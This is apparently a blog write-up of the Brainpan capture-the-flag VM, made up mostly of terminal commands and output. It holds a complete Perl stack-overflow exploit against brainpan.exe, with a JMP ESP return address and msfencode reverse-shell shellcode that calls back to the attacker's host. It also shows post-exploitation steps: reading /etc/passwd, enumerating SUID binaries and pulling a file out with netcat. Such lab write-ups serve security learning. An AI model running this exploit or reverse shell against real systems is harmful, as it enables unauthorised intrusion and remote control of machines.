root@kali:~# netdiscover
192.168.56.104
root@kali:~# unicornscan -mT 192.168.56.104
TCP open ndmp[10000]
root@kali:~# nmap -sS -A 192.168.56.104 -pT:10000
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
root@kali:~# nmap -sT 192.168.56.104 -pT:1-65535
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
root@kali:~# nmap -sS -A 192.168.56.104 -pT:9999
SF-Port9999-TCP:V=6.40%I=7%D=1/16%Time=52D7DAB2%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");
root@kali:~# nc 192.168.56.104 9999
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>>
http://192.168.56.104:10000/
root@kali:~# nikto -host 192.168.56.104 -port 10000
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.104
+ Target Hostname: 192.168.56.104
+ Target Port: 10000
+ Start Time: 2014-01-16 14:21:40 (GMT1)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ 6544 items checked: 25 error(s) and 4 item(s) reported on remote host
+ End Time: 2014-01-16 14:21:52 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
http://192.168.56.104:10000/bin/
brainpan.exe (downloaded)
root@kali:~# hd brainpan.exe | more
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 |MZ..............|
This is a Windows executable.
root@kali:~# wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
root@kali:~# netstat -nl | grep 9999
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN
root@kali:~# nc 127.0.0.1 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>>
root@kali:~# strings brainpan.exe
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>>
ACCESS DENIED
ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter
__getmainargs
__p__environ
__p__fmode
__set_app_type
_assert
_cexit
_iob
_onexit
_setmode
abort
atexit
free
malloc
memset
printf
signal
strcmp
strcpy
strlen
WSACleanup
WSAGetLastError
WSAStartup
accept
bind
closesocket
htons
listen
recv
send
socket
KERNEL32.dll
msvcrt.dll
WS2_32.DLL
root@kali:~# nc 127.0.0.1 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>> shitstorm
ACCESS GRANTED
root@kali:~# nc 192.168.56.104 9999
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>> shitstorm
ACCESS GRANTED
The password is shitstorm.
This is maybe a buffer owerflow challenge....
I send a BIG string to password...
[get_reply] s =
[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa(■B]
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on read access to 0x61616161 at address 0x61616161 (thread 0009), starting debugger...
Unhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).
Register dump:
CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
EIP:61616161 ESP:0042f810 EBP:61616161 EFLAGS:00010206( R- -- I - -P- )
EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810: 61616161 61616161 61616161 61616161
0x0042f820: 61616161 61616161 61616161 61616161
0x0042f830: 61616161 61616161 61616161 61616161
0x0042f840: 61616161 61616161 61616161 61616161
0x0042f850: 61616161 61616161 61616161 61616161
0x0042f860: 61616161 61616161 61616161 61616161
Hexa 61 = 'a'
root@kali:~# hexeditor overflow.txt
root@kali:~# nc 127.0.0.1 9999 < overflow.txt
...
bbbbabcdabcdefghijklmnopqrstuvwxyz{|}~
[get_reply] copied 540 bytes to buffer
EIP:69686766 ESP:0042f810 EBP:65646362 EFLAGS:00010206( R- -- I - -P- )
EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810: 6d6c6b6a 71706f6e 0a747372 00000000
0x0042f820: 00000000 00000000 00000000 00000000
EIP : 69686766 (ihgf) EBP: 65646362 (edcb)
Stack: mlkj qpon utsr yxwv
}|{z
EIP -> ESP, 69686766 (ihgf) -> 0042f810
It Doesn't work because the 00 byte.
root@kali:~# wine OLLYDBG.EXE ../brainpan.exe
Search JMP ESP -> 0x311712f3
root@kali:~# hexeditor overflow.txt
[get_reply] copied 550 bytes to buffer
wine: Unhandled page fault on read access to 0xffffffff at address 0x42f88d (thread 002d), starting debugger...
Unhandled exception: page fault on read access to 0xffffffff in 32-bit code (0x0042f88d).
Register dump:
CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
EIP:0042f88d ESP:0042f810 EBP:65646362 EFLAGS:00010206( R- -- I - -P- )
EAX:ffffffff EBX:7b8a5ff4 ECX:00000073 EDX:0042f600
ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810: 90909090 71909090 75747372 79787776
0x0042f820: 7d7c7b7a 00000a7e 00000000 00000000
0x0042f830: 00000000 00000000 00000000 00000010
0x0042f840: 00000000 00000000 00000000 00000000
0x0042f850: 5da40002 0100007f 00000000 00000000
0x0042f860: 0f270002 00000000 00000000 00000000
root@kali:~# pico buf_ov.pl
#!/usr/bin/perl
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}
$baddata = "A" x 524; # 524 "A" characters to $baddata
$baddata .= pack('V', 0x311712F3); # JMP ESP
$baddata .= "C" x (3000 - length($baddata)); # extends $baddata with "C"
$socket = IO::Socket::INET->new( # setup TCP socket – $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 – IP Address
PeerPort => "$ARGV[1]" # command line variable 2 – TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";
$socket->recv($sd, 1024); # Receive 1024 bytes data from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket
root@kali:~# perl buf_ov.pl 127.0.0.1 9999
[get_reply] copied 1003 bytes to buffer
wine: Unhandled page fault on write access to 0x00000073 at address 0x42f9eb (thread 0009), starting debugger...
Unhandled exception: page fault on write access to 0x00000073 in 32-bit code (0x0042f9eb).
Register dump:
CS:0073 SS:007b DS:007b ES:007b FS:0033 GS:003b
EIP:0042f9eb ESP:0042f810 EBP:41414141 EFLAGS:00010202( R- -- I - - - )
EAX:ffffffff EBX:7b8a61cc ECX:00000073 EDX:00429501
ESI:7ffdf000 EDI:31171280
Stack dump:
0x0042f810: 43434343 43434343 43434343 43434343
0x0042f820: 43434343 43434343 43434343 43434343
0x0042f830: 43434343 43434343 43434343 43434343
0x0042f840: 43434343 43434343 43434343 43434343
0x0042f850: 43434343 43434343 43434343 43434343
0x0042f860: 43434343 43434343 43434343 43434343
root@kali:~# msfpayload windows/shell/reverse_tcp LHOST=192.168.56.101 LPORT=443 C | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
...
root@kali:~# pico buf_ov.pl
root@kali:~# perl buf_ov.pl 127.0.0.1 9999
[get_reply] copied 1003 bytes to buffer
err:seh:setup_exception_record stack overflow 1648 bytes in thread 0009 eip 7bc411a8 esp 00230cc0 stack 0x230000-0x231000-0x430000
root@kali:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl
[*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)
my $buf =
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";
root@kali:~# pico buf_ov2.pl
#!/usr/bin/perl
use IO::Socket;
if ($ARGV[1] eq '') {
die("Usage: $0 IP_ADDRESS PORT\n\n");
}
$nop = "\x90"; # x86 NOP
$baddata = "A" x 524; # 520 "A" characters to $baddata
$baddata .= pack('V', 0x311712F3); # JMP ESP
$baddata .= $nop x 16;
$baddata .=
"\xba\xd5\x06\x65\x2e\xda\xdf\xd9\x74\x24\xf4\x5d\x33\xc9" .
"\xb1\x12\x31\x55\x12\x83\xed\xfc\x03\x80\x08\x87\xdb\x1b" .
"\xce\xb0\xc7\x08\xb3\x6d\x62\xac\xba\x73\xc2\xd6\x71\xf3" .
"\xb0\x4f\x3a\xcb\x7b\xef\x73\x4d\x7d\x87\x43\x05\x45\x32" .
"\x2c\x54\xb6\xb8\x7e\xd1\x57\x70\x18\xb2\xc6\x23\x56\x31" .
"\x60\x22\x55\xb6\x20\xcc\x49\x98\xb7\x64\xfe\xc9\x55\x1d" .
"\x90\x9c\x79\x8f\x3f\x16\x9c\x9f\xcb\xe5\xdf";
$socket = IO::Socket::INET->new( # setup TCP socket – $socket
Proto => "tcp",
PeerAddr => "$ARGV[0]", # command line variable 1 – IP Address
PeerPort => "$ARGV[1]" # command line variable 2 – TCP port
) or die "Cannot connect to $ARGV[0]:$ARGV[1]";
$socket->recv($sd, 1024); # Receive 1024 bytes data from $socket, store in $sd
print "$sd"; # print $sd variable
$socket->send($baddata); # send $baddata variable via $socket
root@kali:~# nc -l -p 1234
root@kali:~# perl buf_ov2.pl 192.168.56.104 9999
...
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
pwd
/home/puck
ls
checksrv.sh
web
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
netstat -nlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 995/brainpan.exe
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 914/python
udp 0 0 0.0.0.0:19733 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp6 0 0 :::2659 :::* -
Active UNIX domain sockets (only servers)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] SEQPACKET LISTENING 6957 - /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 6769 - @/com/ubuntu/upstart
unix 2 [ ACC ] STREAM LISTENING 7573 - /var/run/samba/winbindd_privileged/pipe
unix 2 [ ACC ] STREAM LISTENING 7572 - /tmp/.winbindd/pipe
unix 2 [ ACC ] STREAM LISTENING 9488 999/wineserver socket
unix 2 [ ACC ] STREAM LISTENING 7418 - /var/run/dbus/system_bus_socket
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:reynard
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:reynard
floppy:x:25:
tape:x:26:
sudo:x:27:reynard
audio:x:29:
dip:x:30:reynard
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:reynard
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
crontab:x:102:
syslog:x:103:
messagebus:x:104:
fuse:x:105:
mlocate:x:106:
ssh:x:107:
reynard:x:1000:
lpadmin:x:108:reynard
sambashare:x:109:reynard
anansi:x:1001:
puck:x:1002:
winbindd_priv:x:110:
cat checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep brainpan.exe | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
killall wineserver
killall winedevice.exe
fi
/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi
# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
fi
cd /home/puck/web
/usr/bin/python -m SimpleHTTPServer 10000
fi
find / -type f -perm -04000 -ls
525499 64 -rwsr-xr-x 1 root root 63632 Sep 6 2012 /bin/umount
525495 32 -rwsr-xr-x 1 root root 31124 Sep 6 2012 /bin/su
525498 88 -rwsr-xr-x 1 root root 88768 Sep 6 2012 /bin/mount
530420 32 -rwsr-xr-x 1 root root 30112 Jun 11 2012 /bin/fusermount
525651 40 -rwsr-xr-x 1 root root 39124 Oct 2 2012 /bin/ping6
525650 36 -rwsr-xr-x 1 root root 34780 Oct 2 2012 /bin/ping
...
658003 116 -rwsr-xr-x 2 root root 115140 Feb 27 2013 /usr/bin/sudo
672442 60 -rwsr-xr-x 1 root root 60344 Jun 18 2012 /usr/bin/mtr
658477 32 -rwsr-xr-x 1 root root 30936 Sep 6 2012 /usr/bin/newgrp
658673 32 -rwsr-xr-x 1 root root 31756 Sep 6 2012 /usr/bin/chsh
658003 116 -rwsr-xr-x 2 root root 115140 Feb 27 2013 /usr/bin/sudoedit
658676 40 -rwsr-xr-x 1 root root 40300 Sep 6 2012 /usr/bin/chfn
672094 16 -rwsr-xr-x 1 root root 14020 Oct 2 2012 /usr/bin/traceroute6.iputils
671718 48 -rwsr-sr-x 1 daemon daemon 46576 Jun 11 2012 /usr/bin/at
675550 16 -rwsr-xr-x 1 root lpadmin 13672 Dec 4 2012 /usr/bin/lppasswd
658671 44 -rwsr-xr-x 1 root root 41292 Sep 6 2012 /usr/bin/passwd
658667 60 -rwsr-xr-x 1 root root 57964 Sep 6 2012 /usr/bin/gpasswd
672668 20 -rwsr-sr-x 1 libuuid libuuid 17996 Sep 6 2012 /usr/sbin/uuidd
672521 296 -rwsr-xr-- 1 root dip 301944 Sep 26 2012 /usr/sbin/pppd
656771 12 -rwsr-xr-x 1 anansi anansi 8761 Mar 4 2013 /usr/local/bin/validate
925433 312 -rwsr-xr-- 1 root messagebus 317564 Oct 3 2012 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
925584 244 -rwsr-xr-x 1 root root 248064 Sep 6 2012 /usr/lib/openssh/ssh-keysign
788361 8 -rwsr-xr-x 1 root root 5452 Jun 25 2012 /usr/lib/eject/dmcrypt-get-device
657855 12 -rwsr-xr-x 1 root root 9740 Oct 3 2012 /usr/lib/pt_chown
find / -perm -2 -ls
...
/usr/local/bin/validate
usage /usr/local/bin/validate <input>
/usr/local/bin/validate aaaa
validating input...passed.
/usr/local/bin/validate
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASegmentation fault
root@kali:~# nc -l -p 12345 > validate
nc 192.168.56.101 12345 < /usr/local/bin/validate
root@kali:~# ls -al validate
-rw-r--r-- 1 root root 8761 jan 17 11:47 validate
root@kali:~# ./validate
bash: ./validate: Engedély megtagadva
root@kali:~# chmod 744 validate
root@kali:~# ./validate
usage ./validate <input>
I'm not ready yet to solve this task...
Nincsenek megjegyzések:
Megjegyzés küldése
Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.